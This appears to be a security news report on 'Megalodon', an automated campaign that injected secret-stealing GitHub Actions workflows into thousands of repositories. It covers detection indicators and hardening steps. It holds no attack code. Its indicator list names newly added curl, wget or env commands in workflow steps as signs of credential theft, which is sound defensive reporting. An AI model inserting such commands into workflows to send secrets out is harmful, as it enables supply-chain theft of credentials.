A newly disclosed automated attack campaign dubbed Megalodon has targeted thousands of GitHub repositories with malicious CI/CD workflow injections, pushing 5,718 malicious commits across 5,561 repositories within a single six-hour window — a pace that dramatically outstrips human defenders' ability to respond.
Attack Mechanics
Researchers report that Megalodon used a network of throwaway GitHub accounts with forged author identities designed to blend into automated pipeline activity. Account names observed include:
build-botauto-cici-botpipeline-bot
These names are deliberately chosen to mimic legitimate CI/CD service accounts commonly found in enterprise development environments, making malicious commits harder to spot in high-volume repositories.
Workflow Injection
The attack's primary payload consists of malicious GitHub Actions workflow files injected into targeted repositories. These rogue workflows are designed to:
- Exfiltrate repository secrets — including API keys, tokens, and credentials stored as GitHub Actions secrets
- Establish persistence through workflow triggers that fire on every future commit or pull request
- Pivot to downstream dependencies to potentially spread the infection further through the software supply chain
Why This Attack Is Alarming
The sheer velocity of the Megalodon campaign — over 5,500 repositories compromised in six hours — represents a new benchmark for automated supply chain attacks. Prior major campaigns, including the 2024 tj-actions/changed-files incident and the 2025 MiniShai-Hulud worm, operated over days or weeks.
Key concerns include:
- Scale over stealth: By targeting thousands of repositories simultaneously, attackers maximize the probability that at least some targets contain high-value secrets
- Automated proliferation: Throwaway accounts enable rapid scaling with minimal cost, as each account can be abandoned once detected
- CI/CD as attack surface: Workflow files run in trusted environments with elevated privileges, making them ideal vectors for credential theft
Affected Repositories
The campaign appears to have targeted public repositories across multiple programming language ecosystems, particularly those with active CI/CD pipelines. Repositories using GitHub Actions for automated testing, deployment, or publishing are at elevated risk, as these typically have access to sensitive environment secrets.
Detection and Response
Organizations should audit their repositories for unexpected workflow file additions or modifications, particularly files in .github/workflows/ created by unfamiliar accounts. Specific indicators include:
- Workflow files committed by accounts with bot-like names not previously associated with the project
- Newly added
curl,wget, orenvcommands within workflow steps that were not part of the original pipeline - Unexpected workflow run activity in repository audit logs
Recommended Hardening Measures
- Review GitHub Actions permissions — use the principle of least privilege; avoid granting
writepermissions toGITHUB_TOKENunless necessary - Pin Actions to commit SHAs rather than tags to prevent tag-based supply chain attacks
- Enable branch protection rules requiring pull request reviews before merging workflow file changes
- Rotate any secrets exposed in repositories that received unsolicited commits
- Enable GitHub's secret scanning and push protection to block accidental secret commits
- Audit third-party workflow dependencies regularly
Broader Supply Chain Context
Megalodon arrives amid a wave of supply chain attacks targeting developer infrastructure. The campaign shares tactical similarities with the Mini Shai-Hulud worm that compromised TanStack, Mistral AI, and other packages earlier in May 2026, and the Glassworm attacks that hijacked VS Code extensions in March 2026.
The trend points to a systematic effort by threat actors to exploit the trust placed in automated developer tooling — where a single compromised workflow or package can cascade into dozens of downstream victims.
GitHub has been notified and is reportedly working to remove the malicious commits and suspend the associated accounts.